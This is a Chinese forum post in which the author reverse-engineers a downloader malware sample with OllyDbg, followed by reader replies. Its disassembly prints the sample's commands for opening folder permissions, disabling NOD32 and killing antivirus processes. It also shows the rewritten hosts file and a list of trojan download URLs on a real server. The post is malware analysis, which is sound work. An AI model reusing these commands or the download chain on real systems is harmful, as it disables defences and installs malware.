分析某下载者
本帖最后由 smallyou93 于 2009-6-3 18:23 编辑【文章标题】: 分析某下载者
【文章作者】:Faust
【软件名称】: 论坛里病毒样本区下载的xp.exe
【加壳方式】: NsPack 3.x -> Liu Xing Ping *
【编写语言】: VC6.0
【使用工具】: OD
【操作平台】: winxp SP2
【软件介绍】: 释放病毒dll和驱动文件,修改host文件,下载一大堆木马等等
【作者声明】: 只是感兴趣,无其他目的。失误之处敬请诸位大侠赐教!
所有样本见附件,解压密码:52pojie
想想来了吾爱也蛮久了,说来惭愧我一直都属于灌水一族。所以今天心血来潮也来个病毒分析。分析过程有点凌乱,还请各位大大多多谅解。
首先是查壳,NsPack 的壳直接esp定律脱掉。脱壳后还是显示yoda's Protector v1.02 这个可以不去管,因为压缩的只是资源部份,不妨碍分析。
OD载入之后往下几步看到病毒主文件首先是创建了一个互斥量ttt555004012D1 56 push esi
004012D2 53 push ebx
004012D3 53 push ebx
004012D4 FF15 24204000 call dword ptr [<&kernel32.Crea>; kernel32.CreateMutexA继续向下是执行系统命令0040134F 56 push esi
00401350 50 push eax
00401351 FF15 10374000 call dword ptr ; kernel32.GetWindowsDirectoryA
00401357 8B3D 40204000 mov edi, dword ptr [<&MSVCRT.spri>; MSVCRT.sprintf
0040135D 8D85 E8FDFFFF lea eax, dword ptr
00401363 50 push eax
00401364 8D85 E4FCFFFF lea eax, dword ptr
0040136A 68 C8364000 push 004036C8 ; cmd /c cacls %s /e /p everyone:f
0040136F 50 push eax
00401370 FFD7 call edi
00401372 83C4 0C add esp, 0C
00401375 8D85 E4FCFFFF lea eax, dword ptr
0040137B 53 push ebx
0040137C 50 push eax
0040137D FF15 FC364000 call dword ptr ; kernel32.WinExec
00401383 8B1D 20204000 mov ebx, dword ptr [<&kernel32.Ge>; kernel32.GetTempPathA
00401389 8D85 E8FDFFFF lea eax, dword ptr
0040138F 50 push eax
00401390 56 push esi
00401391 FFD3 call ebx
00401393 8D85 E8FDFFFF lea eax, dword ptr
00401399 50 push eax
0040139A 8D85 E4FCFFFF lea eax, dword ptr
004013A0 68 A4364000 push 004036A4 ; cmd /c cacls "%s" /e /p everyone:f
004013A5 50 push eax
004013A6 FFD7 call edi
004013A8 83C4 0C add esp, 0C
004013AB 8D85 E4FCFFFF lea eax, dword ptr
004013B1 6A 00 push 0
004013B3 50 push eax
004013B4 FF15 FC364000 call dword ptr ; kernel32.WinExec也就是分别把C:\WINDOWS 和当前用户的临时文件夹设置为everyone可以浏览权限
继续往下分析可以看到病毒主文件继续执行命令004013D1 68 7C364000 push 0040367C ; cmd /c sc config ekrn start= disabled
004013D6 50 push eax
004013D7 FFD7 call edi
004013D9 83C4 0C add esp, 0C
004013DC 8D85 E4FCFFFF lea eax, dword ptr
004013E2 6A 00 push 0
004013E4 50 push eax
004013E5 FF15 FC364000 call dword ptr ; kernel32.WinExec
004013EB 8D85 E8FDFFFF lea eax, dword ptr
004013F1 50 push eax
004013F2 56 push esi
004013F3 FFD3 call ebx
004013F5 8D85 E8FDFFFF lea eax, dword ptr
004013FB 50 push eax
004013FC 8D85 E4FCFFFF lea eax, dword ptr
00401402 68 5C364000 push 0040365C ; cmd /c taskkill /im ekrn.exe /f
00401407 50 push eax
00401408 FFD7 call edi
0040140A 83C4 0C add esp, 0C
0040140D 8D85 E4FCFFFF lea eax, dword ptr
00401413 6A 00 push 0
00401415 50 push eax
00401416 FF15 FC364000 call dword ptr ; kernel32.WinExec
0040141C 8D85 E8FDFFFF lea eax, dword ptr
00401422 50 push eax
00401423 56 push esi
00401424 FFD3 call ebx
00401426 8D85 E8FDFFFF lea eax, dword ptr
0040142C 50 push eax
0040142D 8D85 E4FCFFFF lea eax, dword ptr
00401433 68 3C364000 push 0040363C ; cmd /c taskkill /im egui.exe /f
00401438 50 push eax
00401439 FFD7 call edi
0040143B 83C4 0C add esp, 0C
0040143E 8D85 E4FCFFFF lea eax, dword ptr
00401444 6A 00 push 0
00401446 50 push eax
00401447 FF15 FC364000 call dword ptr ; kernel32.WinExec
0040144D 8D85 E8FDFFFF lea eax, dword ptr
00401453 50 push eax
00401454 56 push esi
00401455 FFD3 call ebx
00401457 8D85 E8FDFFFF lea eax, dword ptr
0040145D 50 push eax
0040145E 8D85 E4FCFFFF lea eax, dword ptr
00401464 68 18364000 push 00403618 ; cmd /c taskkill /im scanfrm.exe /f
00401469 50 push eax
0040146A FFD7 call edi
0040146C 83C4 0C add esp, 0C
0040146F 8D85 E4FCFFFF lea eax, dword ptr
00401475 6A 00 push 0
00401477 50 push eax
00401478 FF15 FC364000 call dword ptr ; kernel32.WinExec可以看到病毒用cmd /c sc config ekrn start= disabled停止了nod32的服务,然后分别使用 cmd /c taskkill /im ekrn.exe /f和 cmd /c taskkill /im egui.exe /f结束了nod32的进程……哎……nod32的自我防护弱的可怜cmd /c taskkill /im scanfrm.exe /f则是结束掉瑞星2009的空闲时段查杀进程。其中让我很困惑的是病毒居然又在
00401433 68 3C364000 push 0040363C ; cmd /c taskkill /im egui.exe /f
这里往下再次结束了一次nod32的进程……汗,作者和nod32有深仇大恨吗?还是过于惧怕nod了?呵呵。
言归正传,继续往下分析可以看到病毒在C:\WINDOWS\system32文件夹里释放并加载了func.dll这个病毒dll,休息几秒后又释放出了phpi.dll,位置是C:\WINDOWS\phpi.dll00401493 FF15 10374000 call dword ptr ; kernel32.GetWindowsDirectoryA
00401499 8D85 ECFEFFFF lea eax, dword ptr
0040149F 68 04364000 push 00403604 ; \system32\func.dll
004014A4 50 push eax
004014A5 E8 06020000 call <jmp.&MSVCRT._mbscat>
004014AA 66:817D F0 D707 cmp word ptr , 7D7
004014B0 59 pop ecx
004014B1 59 pop ecx
004014B2 BF 00364000 mov edi, 00403600 ; bin
004014B7 76 21 jbe short 004014DA
004014B9 8D85 ECFEFFFF lea eax, dword ptr
004014BF 50 push eax
004014C0 57 push edi
004014C1 68 95000000 push 95
004014C6 E8 7BFCFFFF call 00401146//释放资源的函数
004014CB 83C4 0C add esp, 0C
004014CE 53 push ebx
004014CF 68 E0354000 push 004035E0 ; rundll32.exe func.dll, droqp
004014D4 FF15 FC364000 call dword ptr ; kernel32.WinExec
004014DA 68 204E0000 push 4E20
004014DF FF15 1C204000 call dword ptr [<&kernel32.Sleep>; kernel32.Sleep
004014E5 8D85 E0FBFFFF lea eax, dword ptr
004014EB 56 push esi
004014EC 50 push eax
004014ED 53 push ebx
004014EE FF15 18204000 call dword ptr [<&kernel32.GetMo>; kernel32.GetModuleFileNameA
004014F4 8D85 ECFEFFFF lea eax, dword ptr
004014FA 56 push esi
004014FB 50 push eax
004014FC FF15 14204000 call dword ptr [<&kernel32.GetWi>; kernel32.GetWindowsDirectoryA
00401502 8D85 ECFEFFFF lea eax, dword ptr
00401508 68 D4354000 push 004035D4 ; \phpi.dll
0040150D 50 push eax
0040150E E8 9D010000 call <jmp.&MSVCRT._mbscat>
00401513 8D85 ECFEFFFF lea eax, dword ptr
00401519 50 push eax
0040151A 57 push edi
0040151B 68 8F000000 push 8F
00401520 E8 21FCFFFF call 00401146 //释放资源的函数
此时可以一路F8,到了0040165E FFD7 call edi//
到这里病毒主程序执行完毕~~ phpi.dll开始下载木马 跟进继续分析phpi.dll的内容
一路F8来到10004989后跟进1000499D FF15 80040010 call dword ptr [<&KERNEL32.GetWi>; kernel32.GetWindowsDirectoryA
100049A3 BE 380B0010 mov esi, 10000B38 ; \explorer.exe
100049A8 8DBD 94FEFFFF lea edi, dword ptr
————————————————
100049C2 8D85 94FEFFFF lea eax, dword ptr
100049C8 50 push eax
100049C9 FF75 08 push dword ptr
100049CC FF15 84050010 call dword ptr [<&MSVCRT._stricm>; MSVCRT._stricmp这一段相当于组成了 用explorer.exe+参数来打开目录,继续往下可以看到
10004A5B E8 D6CFFFFF call 10001A36在这里跟进之后发现10001A53 50 push eax
10001A54 FF15 A0040010 call dword ptr [<&KERNEL32.GetSys>; kernel32.GetSystemDirectoryA
10001A5A BE B0070010 mov esi, 100007B0 ; \drivers\pcidump.sys
10001A5F 8DBD F4FEFFFF lea edi, dword ptr 这里释放了一个pcidump.sys驱动到系统system32目录————————————————————————————
10001BA1 68 3F000F00 push 0F003F
10001BA6 6A 00 push 0
10001BA8 6A 00 push 0
10001BAA FF15 08040010 call dword ptr [<&ADVAPI32.OpenSC>; ADVAPI32.OpenSCManagerA这里下面的代码就是打开服务管理器之类的注册和加载驱动的过程了
继续跟踪发现病毒创建线程,修改host文件,具体过程就不列出来了10004B47 FF15 8C040010 call dword ptr [<&KER>; kernel32.CreateThread
10004B4D 68 04010000 push 104
10004B52 8D85 90FDFFFF lea eax, dword ptr [>
10004B58 50 push eax
10004B59 FF15 A0040010 call dword ptr [<&KER>; kernel32.GetSystemDirectoryA
10004B5F BE CC0B0010 mov esi, 10000BCC ; ASCII "\drivers\etc\hosts"
——————————————————————————————————————————修改后的host文件内容是:127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.0.0.3 adlaji.cn
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 vip2.51.la
127.0.0.1 web.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
————————————————————————————
继续分析看到这里10003679 8985 F0EFFFFF mov dword ptr , eax
1000367F 83BD F0EFFFFF 0>cmp dword ptr , 0
10003686 74 26 je short 100036AE查看信息窗口可以看到
eax=00000000
堆栈 ss:=0012CD18, (ASCII "http://x3r6.com/360/v1.txt")
直接打开URL发现1:http://60.173.10.59/xiao/aa1.exe
1:http://60.173.10.59/xiao/aa2.exe
1:http://60.173.10.59/xiao/aa3.exe
1:http://60.173.10.59/xiao/aa4.exe
1:http://60.173.10.59/xiao/aa5.exe
1:http://60.173.10.59/xiao/aa6.exe
1:http://60.173.10.59/xiao/aa7.exe
1:http://60.173.10.59/xiao/aa8.exe
1:http://60.173.10.59/xiao/aa9.exe
1:http://60.173.10.59/xiao/aa10.exe
1:http://60.173.10.59/xiao/aa11.exe
1:http://60.173.10.59/xiao/aa12.exe
1:http://60.173.10.59/xiao/aa13.exe
1:http://60.173.10.59/xiao/aa14.exe
1:http://60.173.10.59/xiao/aa15.exe
1:http://60.173.10.59/xiao/aa16.exe
1:http://60.173.10.59/xiao/aa17.exe
1:http://60.173.10.59/xiao/aa18.exe
1:http://60.173.10.59/xiao/aa19.exe
1:http://60.173.10.59/xiao/aa20.exe
1:http://60.173.10.59/xiao/aa21.exe
1:http://60.173.10.59/xiao/aa22.exe
1:http://60.173.10.59/xiao/aa23.exe
1:http://60.173.10.59/xiao/aa24.exe
1:http://60.173.10.59/xiao/aa25.exe
1:http://60.173.10.59/xiao/aa26.exe
1:http://60.173.10.59/xiao/aa27.exe
1:http://60.173.10.59/xiao/aa28.exe
1:http://60.173.10.59/xiao/aa29.exe
1:http://60.173.10.59/xiao/aa30.exe
1:http://60.173.10.59/xiao/aa31.exe
1:http://60.173.10.59/xiao/aa32.exe
1:http://60.173.10.59/xiao/aa33.exe
1:http://60.173.10.59/xiao/aa34.exe
1:http://60.173.10.59/xiao/aa35.exe
1:http://60.173.10.59/xiao/aa36.exe
这里可以知道木马下载了这一大堆东西到电脑里,继续往下看:10003764 50 push eax
10003765 8D8D 50E4FFFF lea ecx, dword ptr
1000376B FF15 C8040010 call dword ptr [<&MSVCP60.std::b>;
MSVCP60.std::basic_ifstream<char,std::char_traits<char> >:pen分析到这里的时候看信息窗口知道那一堆木马被下载到了C:\Documents and Settings\kel\Local Settings\Temporary Internet 这个文件夹
天色已晚,加上水平问题所以那个释放出来的驱动文件这里就不分析了。第一次写分析文章,有不妥之处还请各位大大指出 很经典的一个病毒,呵呵 呵呵,病毒样本区下载回来分析着玩的……
有不准确的地方还请指教呢~ 好熟悉的样本,貌似还没分析全? 原来还有病毒样本呀,俺也瞧瞧去. http://bbs.52pojie.cn/thread-24585-1-1.html
样本是上面那个帖子里Hmily 发的~
还剩下那个释放出来的驱动文件没有分析…… 欢迎多多发布病毒分析教程,加精鼓励! 除了驱动,phpi.dll就还没分析全,呵呵,加油。 呵呵,谢谢ximo大大指导:)
回去继续看一下 :)已加入病毒分析的精华文章索引,请继续努力